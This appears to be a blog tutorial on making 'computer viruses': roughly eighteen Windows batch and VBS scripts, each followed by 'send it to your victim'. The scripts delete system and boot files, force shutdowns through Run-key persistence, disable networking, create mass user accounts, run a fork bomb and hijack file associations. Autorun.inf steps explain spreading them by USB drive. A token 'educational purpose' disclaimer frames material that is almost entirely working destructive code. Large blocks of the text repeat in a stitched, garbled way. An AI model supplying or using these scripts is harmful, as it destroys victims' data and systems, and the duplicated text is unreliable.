Hi Friends
Here I come with New trick . Today i will teach you How to Make Computer Virus . These Virus can destroy anyone's computer .
NOTE :- This is only for Educational Purpose and I am not Responsible if You Destoryed your Computer .
>>What Can a Computer Virus Do ?
>> This virus can format hard disk ,currupt windows , delete important files of windows , freeze desktop,decrease performace ,disable firewalls , and can do lots of mashup with computer .
We have done Lots of Talk :-P
Now Lets Start .....
Open notepad and type or copy below Virus Codes
1. Shutdown virus :-
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" and send it to your victim.
2. Toggle Caps Lock Virus:-
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it to your victim.
3. Automatic Hit Enter Virus :-
Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it to yuy victim.
4. Automatic Popout CD-Drive Virus:-
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it to your victim.
5. Format System drive Virus:-
Code:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As "Anything.bat" and send it to your victim.
6.Crash Computer Virus:-
Code:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save it as "Anything.VBS" and send it to your victim.
7.Crash Windows Virus :-
Code:
@Echo off
Del C: *.* |y
Save It As "Anything.bat" and send it to your victim.
8. System Bomber :-
Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT HACKED!!!
shutdown -s -t 7 -c "A VIRUS IS DESTROYING YOU" c:Drive
Save The Above Code As Anything.bat and send it to your victim.
This Will Pop Up A Message Saying "YOU GOT HACKED!!
And Shut Down The Computer TO NEVER Reboot Again!
9.Shutdown Computer Everytime It Starts Virus :-
Code:
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Save it as "Anything.BAT" and send it to your victim
10.Disable Internet Permanent Virus :-
Code:
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Your Internet has Been HACKED!
PAUSE
Save it as "Anything.BAT" and send it to your victim.
11.Change File Into Unsupported TXT Extension Virus :-
Code:
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Save it as "Anything.BAT" and send it to your victim.
12.Flood Network Virus :-
Code:
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Save it as "Anything.BAT" and send it to your victim.
13.Folder Flooder:-
Code:
@echo off
:x
md %random% // makes directory or folder.
goto x
Save it as "Anything.BAT" and send it to your victim.
14.User Acoount Flooder :-
Code:
This method only works in windows xp , In Windows 7 or earlier automatic execution is disbaled.
Here I come with New trick . Today i will teach you How to Make Computer Virus . These Virus can destroy anyone's computer .
NOTE :- This is only for Educational Purpose and I am not Responsible if You Destoryed your Computer .
>>What Can a Computer Virus Do ?
>> This virus can format hard disk ,currupt windows , delete important files of windows , freeze desktop,decrease performace ,disable firewalls , and can do lots of mashup with computer .
We have done Lots of Talk :-P
Now Lets Start .....
Open notepad and type or copy below Virus Codes
1. Shutdown virus :-
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" and send it to your victim.
2. Toggle Caps Lock Virus:-
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it to your victim.
3. Automatic Hit Enter Virus :-
Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it to yuy victim.
4. Automatic Popout CD-Drive Virus:-
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it to your victim.
5. Format System drive Virus:-
Code:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As "Anything.bat" and send it to your victim.
6.Crash Computer Virus:-
Code:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save it as "Anything.VBS" and send it to your victim.
7.Crash Windows Virus :-
Code:
@Echo off
Del C: *.* |y
Save It As "Anything.bat" and send it to your victim.
8. System Bomber :-
Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT HACKED!!!
shutdown -s -t 7 -c "A VIRUS IS DESTROYING YOU" c:Drive
Save The Above Code As Anything.bat and send it to your victim.
This Will Pop Up A Message Saying "YOU GOT HACKED!!
And Shut Down The Computer TO NEVER Reboot Again!
9.Shutdown Computer Everytime It Starts Virus :-
Code:
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Save it as "Anything.BAT" and send it to your victim
10.Disable Internet Permanent Virus :-
Code:
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Your Internet has Been HACKED!
PAUSE
Save it as "Anything.BAT" and send it to your victim.
11.Change File Into Unsupported TXT Extension Virus :-
Code:
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Save it as "Anything.BAT" and send it to your victim.
12.Flood Network Virus :-
Code:
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Save it as "Anything.BAT" and send it to your victim.
13.Folder Flooder:-
Code:
@echo off
:x
md %random% // makes directory or folder.
goto x
Save it as "Anything.BAT" and send it to your victim.
14.User Acoount Flooder :-
Code:
@echo off
:x
net user %random% /add //create user account
goto x
Save it as "Anything.BAT" and send it to your victim.
15. Application Bomber :-
Code:
@echo off
:a
start notepad
start mspaint
start cmd
start write
start calc
start control
start explorer
start winword
goto a
:a
start notepad
start mspaint
start cmd
start write
start calc
start control
start explorer
start winword
goto a
Save it as "Anything.BAT" and send it to your victim.
16. Delete Boot File Virus :-
Code:
attrib -S -R -H C:\ntldr
del ntldr
Save it as "Anything.BAT" and send it to your victim.
del ntldr
Save it as "Anything.BAT" and send it to your victim.
17. Freeze Computer Virus :-
Code:
%0|%0
Save it as "Anything.BAT" and send it to your victim .
18. Extension Changer :-
Code:
@echo off
assoc .txt=mk
assoc .exe=mk
assoc .jpeg=mk
assoc .png=mk
assoc .mpeg=mk
Save it as "Anything.BAT" and send it to your victim.
assoc .txt=mk
assoc .exe=mk
assoc .jpeg=mk
assoc .png=mk
assoc .mpeg=mk
Save it as "Anything.BAT" and send it to your victim.
>>> Spreading Viruses Through Pendrive <<<
Open notepad and write ,
[autorun]
open=anything.bat or anything.vbs (depends on if virus is batch file or vbs file )
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
open=anything.bat or anything.vbs (depends on if virus is batch file or vbs file )
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
This method only works in windows xp , In Windows 7 or earlier automatic execution is disbaled.

No comments:
Write comments